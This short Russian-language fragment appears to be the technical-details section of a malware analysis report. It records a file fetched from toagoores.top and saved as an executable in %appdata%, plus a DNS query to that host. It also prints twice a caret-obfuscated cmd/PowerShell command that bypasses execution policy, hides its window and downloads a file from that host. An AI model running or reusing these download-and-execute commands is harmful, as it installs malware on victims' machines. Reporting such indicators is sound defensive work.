Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poweR^sh^e^Ll^.exe ^-^Exe^c^UTI^on^poliC^Y bY^PASS -NOpr^OFI^le -W^inDOwSty^LE ^h^idd^E^N^ (^New-Ob^J^E^ct syStem^.NE^t^.w^EBclIe^NT).D^OwNl^O^A^df^I^l^e('http://toagoores.top/read....
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "poweR^sh^e^Ll^.exe ^-^Exe^c^UTI^on^poliC^Y bY^PASS -NOpr^OFI^le -W^inDOwSty^LE ^h^idd^E^N^ (^New-Ob^J^E^ct syStem^.NE^t^.w^EBclIe^NT).D^OwNl^O^A^df^I^l^e('http://toagoores.top/read....' (со скрытым окном)